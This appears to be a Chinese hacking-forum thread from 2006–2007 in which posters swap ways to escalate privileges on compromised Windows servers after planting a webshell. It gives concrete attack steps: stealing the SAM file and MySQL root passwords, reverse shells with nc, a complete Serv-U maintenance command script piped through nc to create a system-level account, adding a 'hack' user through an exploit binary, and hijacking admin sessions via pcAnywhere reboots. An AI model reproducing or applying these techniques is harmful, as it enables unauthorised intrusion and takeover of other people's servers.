引用:

引用第44楼paopao于2006-06-28 15:16发表的 [讨论]Re:[讨论]webshell艰难提权 N天了也搞不定 :
信息来源：邪恶八进制信息安全团队（www.eviloctal.com） [s:78] 下载他的sam表啊

怎么下？就用一个webshell下？
下过来 的 是一个空的   
最多  去试下repair目录下面的那个sam  还不一定下得了。

引用:

引用第6楼又一天于2006-06-09 14:09发表的 :
[s:73] 楼主`告诉你个最无敌的办法,你用pcanywhere的重新启动服务器功能,不停的重新启动他服务器,逼他登陆`然后抢线,跟抢劫一样,在他还惊恐中的时候,迅速搞颠晒

牛B 这都行

换几个不同的木马看看 说不定有的会有很大的权限呢
不是说可以破解pc吗  我记得有个windows的密码破解软件
去谷歌找找应该有 破解C:\WINDOWS\system32\config\SAM这个文件可以吧

使用net1.exe
如果支持aspx的话搜索 web.config里面一般存放的是sa的密码之类的。。然后剑心sqljnc.asp链接本地 的1433

1、pcanywhere是可以任意上传下载文件
2、WSCRIPT.NETWORK 提权

看你的运气咯


慢慢的式
等到哪天PC的管理员登录了
你就可以用PCANTWHERE登录的

郁闷 ，看了半天怎么还是不明白你们说的，既然能支持PHP
我们可以考虑的有两个地方，到C/;WINDOWS找MY.INI文件找到ROOT帐户和密码
二：我们上传PHP的马提权 ，这个大家应该都会吧
有SERV-U
我们试PHP提权的马，该下帐户和密码，假如管理员改密码的话
在着，基于RAW下的FTP嗅探，我们先上传一个NC 反弹回来一个CMDSHELL
JET溢出或者直接用NC反弹都可以
进行嗅探，好的话可以直接嗅探到一个ADMIN的帐号和密码
或者我们用反弹回来的CMDSHELL进行端口转发，在本机建立一个SERV-U
这个大家应该都会吧


呵呵 小弟不才啊

提权靠的就是大家的灵活运用，没有提不了的权，只有想不到的办法
嘿嘿

对了 刚才漏说了下
假如我们在反弹胡来的CMDSHELL里用SERV提权不成功
我们还可以配合用NC添加一个可以执行的帐户
嘿嘿
首先我们在本机建立一个文档
USER localadministrator
PASS #l@$ak#.lk;0@P
SITE MAINTENANCE
-SETUSERSETUP
-IP=61.143.251.***
-PortNO=21
-User=kkb
-Password=830306
-HomeDir=c:\

-Maintenance=System
-RelPaths=1
Access=c:|RWAMELCDP
存为B.TXT
接着我们在CMDSHELL里执行
nc -vv 127.0.0.1 43958<b.txt
嘿嘿
90％的可能加成功

引用:

引用第8楼守护天使于2006-06-09 16:09发表的 :
[s:70] 这总体来说是跟长相有很大关系的。。

传个LAKE2的servu.aspx试试，PHP马也有SERVUEXP。。再从WINDOWS目录下找找看，如果长相好的话说不定能找到ROOT密码。而且pcanywhere的权限大着呢，只要你连上了没什么做不了的。 [s:90]

靠，windows目录找root的密码？？？
    MYSQL的root密码么？   我是头一次听说mysql的root密码是放在windows目录下的。
    而且 一般的站 会允许webshell访问系统目录  或者有执行权限么？  
    要是有执行权限的话 直接放鸽子上去就OK了。

先看服务器上SERVU的版本。建立个帐号。放到本地。
等哪天管理员上了。就用pcanywhere过去覆盖。哇哈哈~！
或者。。。下一些重要滴东东来看

引用:

引用第84楼nixilin于2007-09-08 17:13发表的 :



靠，windows目录找root的密码？？？
    MYSQL的root密码么？   我是头一次听说mysql的root密码是放在windows目录下的。
.......

那是因为你孤陋寡闻，2k运气好的话在my.ini里就能找到，至少我找到过

传只鸽子进去，写个bat命令。ok。

高手
FTP提权管理员都比你们老练了

可以试下udf.dll提权，郁闷代码太长　发不了
http://www.hacklu.net/blog/read.php/257.htm

引用:

引用第8楼守护天使于2006-06-09 16:09发表的 :
[s:70] 这总体来说是跟长相有很大关系的。。

传个LAKE2的servu.aspx试试，PHP马也有SERVUEXP。。再从WINDOWS目录下找找看，如果长相好的话说不定能找到ROOT密码。而且pcanywhere的权限大着呢，只要你连上了没什么做不了的。 [s:90]

小弟冒昧说一句！貌似pcanywhere只可以重启吧！！

webshell上NC反弹一个guestCMD
用c:\MS0703.exe "net user hack hack /add"
------------------------------------
命令成功完成。

可以结贴了。
我就是水晶雨

webshell上NC反弹一个guestCMD
用c:\MS0703.exe "net user hack hack /add"

打补丁了呢?

今天碰到一站提权的问题
需要请教
不支持WSCRIPT
但是ASPX PHP
装有SERV-U 6.3的
改了密码
装有防火墙 普通的命令都能执行
但是用NC反弹CMDSHELL反弹不回来
欲打算用HTRAN.EXE转发出来
被杀 用FPIPE.EXE不能执行
服务器上站太多 找CONN.ASP WEBCON.FIG找了半天找不到 UDF.DLL不要想 找不到ROOT密码

现在找人帮忙 看怎么提权 加我QQ 304202727

我晕，貌似现在的su目录都不可写了，。。已经做了限制了，我发现有的su不能直接提权是因为防火墙的原因，因为本地链接他的端口要过滤的嘛，说的也不清楚，反正lz看看防火墙什么的吧，


我有shellnet都能执行就是不能加用户， 可以执行3389.exe，但是不能执行我的小马，今天晚了，改天继续搞    不然就用inf吧，等待最完美

snailsor@gmail.com
我帮你提提看

引用:

引用第91楼jjzj8于2007-09-20 15:25发表的 :
webshell上NC反弹一个guestCMD
用c:MS0703.exe "net user hack hack /add"
------------------------------------
命令成功完成。

.......

一般服务器都有自带防火墙，你想用NC？杀掉防火墙再来吧！

引用:

引用第84楼nixilin于2007-09-08 17:13发表的 :



靠，windows目录找root的密码？？？
    MYSQL的root密码么？   我是头一次听说mysql的root密码是放在windows目录下的。
    而且 一般的站 会允许webshell访问系统目录 或者有执行权限么？
    要是有执行权限的话 直接放鸽子上去就OK了。.......

为什么不能在windows目录找到MYSQL的密码？

   而且 一般的站 会允许webshell访问系统目录 或者有执行权限么？

这句话我没听懂什么意思，据我所知道的，中国万网的那么多的服务器，全部都能用webshell能查看系统目录的内容。
Internet来宾用户 权限貌似比guest的权限还底吧。

我这个无名菜鸟所知道的只有那么多，希望对大家有帮助。

MSSQL在db_owner角色下添加SYSADMIN帐号，你去找找，然后自己在webshell里创建个sa注入点，剩下的自己发挥吧。

用DB权限查找他是否装了其他软件
浏览目录最佳工具呀。还用想那么多做什么。。要是被你碰上sv-u直接就在shell里面输入地址看看...说不定还能看到s-u提权...要不然也得看看其他盘装了啥

MS0703..? 我怎么没找到这个漏洞的exploits ，baidu里貌似没有，，MS分布了这个漏洞吗？